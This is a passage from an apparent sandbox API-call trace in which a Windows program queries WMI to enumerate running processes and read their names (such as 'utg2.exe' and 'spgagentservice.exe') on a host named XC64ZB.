This=0x5529d68, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x55382a8) returned 0x0 [0265.384] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x55382a8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.384] WbemDefPath:IUnknown:Release (This=0x55382a8) returned 0x3 [0265.384] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529d68, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.385] WbemDefPath:IUnknown:Release (This=0x5529d68) returned 0x2 [0265.385] WbemDefPath:IUnknown:Release (This=0x5529d68) returned 0x1 [0265.385] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529d68, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5529d68) returned 0x0 [0265.385] WbemDefPath:IUnknown:AddRef (This=0x5529d68) returned 0x3 [0265.385] WbemDefPath:IUnknown:Release (This=0x5529d68) returned 0x2 [0265.385] WbemDefPath:IWbemPath:SetText (This=0x5529d68, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4392\"") returned 0x0 [0265.385] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.385] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.385] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.385] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.385] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.385] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.385] IWbemClassObject:Get (in: This=0x552cb60, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e71e8*=0, plFlavor=0x23e71ec*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="utg2.exe", varVal2=0x0), pType=0x23e71e8*=8, plFlavor=0x23e71ec*=0) returned 0x0 [0265.385] SysStringByteLen (bstr="utg2.exe") returned 0x10 [0265.386] SysStringByteLen (bstr="utg2.exe") returned 0x10 [0265.386] IWbemClassObject:Get (in: This=0x552cb60, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e71e8*=8, plFlavor=0x23e71ec*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="utg2.exe", varVal2=0x0), pType=0x23e71e8*=8, plFlavor=0x23e71ec*=0) returned 0x0 [0265.386] SysStringByteLen (bstr="utg2.exe") returned 0x10 [0265.386] SysStringByteLen (bstr="utg2.exe") returned 0x10 [0265.386] CoTaskMemAlloc (cb=0x4) returned 0x54ba3b8 [0265.386] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba3b8, puReturned=0x23c1fd0 | out: apObjects=0x54ba3b8*=0x553adf8, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.387] IUnknown:QueryInterface (in: This=0x553adf8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x553adf8) returned 0x0 [0265.387] IUnknown:QueryInterface (in: This=0x553adf8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.387] IUnknown:QueryInterface (in: This=0x553adf8, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.387] IUnknown:QueryInterface (in: This=0x553adf8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.387] IUnknown:AddRef (This=0x553adf8) returned 0x3 [0265.387] IUnknown:QueryInterface (in: This=0x553adf8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.387] IUnknown:QueryInterface (in: This=0x553adf8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.387] IUnknown:QueryInterface (in: This=0x553adf8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x553adfc) returned 0x0 [0265.388] IMarshal:GetUnmarshalClass (in: This=0x553adfc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.388] IUnknown:Release (This=0x553adfc) returned 0x3 [0265.388] IUnknown:QueryInterface (in: This=0x553adf8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.388] IUnknown:Release (This=0x553adf8) returned 0x2 [0265.388] IUnknown:QueryInterface (in: This=0x553adf8, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x553adf8) returned 0x0 [0265.388] IUnknown:AddRef (This=0x553adf8) returned 0x4 [0265.388] IUnknown:Release (This=0x553adf8) returned 0x3 [0265.388] IUnknown:Release (This=0x553adf8) returned 0x2 [0265.388] CoTaskMemFree (pv=0x54ba3b8) [0265.388] IUnknown:AddRef (This=0x553adf8) returned 0x3 [0265.388] IWbemClassObject:Get (in: This=0x553adf8, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.388] IWbemClassObject:Get (in: This=0x553adf8, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4400\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.388] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4400\"") returned 0x5e [0265.389] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4400\"") returned 0x5e [0265.389] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.389] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.389] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.389] IUnknown:Release (This=0x601a94) returned 0x1 [0265.389] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.390] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.390] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5529dd8) returned 0x0 [0265.390] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.390] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529dd8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5529dd8) returned 0x0 [0265.390] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529dd8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.390] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529dd8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.390] WbemDefPath:IUnknown:AddRef (This=0x5529dd8) returned 0x3 [0265.390] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529dd8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.390] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529dd8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.390] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529dd8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5538338) returned 0x0 [0265.390] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5538338, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.390] WbemDefPath:IUnknown:Release (This=0x5538338) returned 0x3 [0265.390] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529dd8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.391] WbemDefPath:IUnknown:Release (This=0x5529dd8) returned 0x2 [0265.391] WbemDefPath:IUnknown:Release (This=0x5529dd8) returned 0x1 [0265.391] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529dd8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5529dd8) returned 0x0 [0265.391] WbemDefPath:IUnknown:AddRef (This=0x5529dd8) returned 0x3 [0265.391] WbemDefPath:IUnknown:Release (This=0x5529dd8) returned 0x2 [0265.391] WbemDefPath:IWbemPath:SetText (This=0x5529dd8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4400\"") returned 0x0 [0265.391] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.391] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.391] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.391] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.391] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.391] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.391] IWbemClassObject:Get (in: This=0x553adf8, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e7a6c*=0, plFlavor=0x23e7a70*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="spgagentservice.exe", varVal2=0x0), pType=0x23e7a6c*=8, plFlavor=0x23e7a70*=0) returned 0x0 [0265.395] SysStringByteLen (bstr="spgagentservice.exe") returned 0x26 [0265.395] SysStringByteLen (bstr="spgagentservice.exe") returned 0x26 [0265.395] IWbemClassObject:Get (in: This=0x553adf8, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e7a6c*=8, plFlavor=0x23e7a70*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="spgagentservice.exe", varVal2=0x0), pType=0x23e7a6c*=8, plFlavor=0x23e7a70*=0) returned 0x0 [0265.395] SysStringByteLen (bstr="spgagentservice.exe") returned 0x26 [0265.395] SysStringByteLen (bstr="spgagentservice.exe") returned 0x26 [0265.395] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.395] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x553b128, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.396] IUnknown:QueryInterface (in: This=0x553b128, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x553b128) returned 0x0 [0265.396] IUnknown:QueryInterface (in: This=0x553b128, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.396] IUnknown:QueryInterface (in: This=0x553b128, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.396] IUnknown:QueryInterface (in: This=0x553b128, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.396] IUnknown:AddRef (This=0x553b128) returned 0x3 [0265.396] IUnknown:QueryInterface (in: This=0x553b128, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.396] IUnknown:QueryInterface (in: This=0x553b128, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.396] IUnknown:QueryInterface (in: This=0x553b128, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x553b12c) returned 0x0 [0265.396] IMarshal:GetUnmarshalClass (in: This=0x553b12c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.396] IUnknown:Release (This=0x553b12c) returned 0x3 [0265.396] IUnknown:QueryInterface (in: This=0x553b128, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.396] IUnknown:Release (This=0x553b128) returned 0x2 [0265.396] IUnknown:QueryInterface (in: This=0x553b128, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x553b128) returned 0x0 [0265.397] IUnknown:AddRef (This=0x553b128) returned 0x4 [0265.397] IUnknown:Release (This=0x553b128) returned 0x3 [0265.397] IUnknown:Release (This=0x553b128) returned 0x2 [0265.397] CoTaskMemFree (pv=0x54ba2d8) [0265.397] IUnknown:AddRef (This=0x553b128) returned 0x3 [0265.397] IWbemClassObject:Get (in: This=0x553b128, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.397] IWbemClassObject:Get (in: This=0x553b128, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4408\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.398] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4408\"") returned 0x5e [0265.398] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4408\"") returned 0x5e [0265.398] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.398] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.398] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.398] IUnknown:Release (This=0x601a94) returned 0x1 [0265.399] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba3b8) returned 0x0 [0265.400] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba3b8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.400] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba3b8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a468) returned 0x0 [0265.400] WbemDefPath:IUnknown:Release (This=0x54ba3b8) returned 0x0 [0265.400] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a468, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a468) returned 0x0 [0265.400] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a468, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.400] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a468, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | 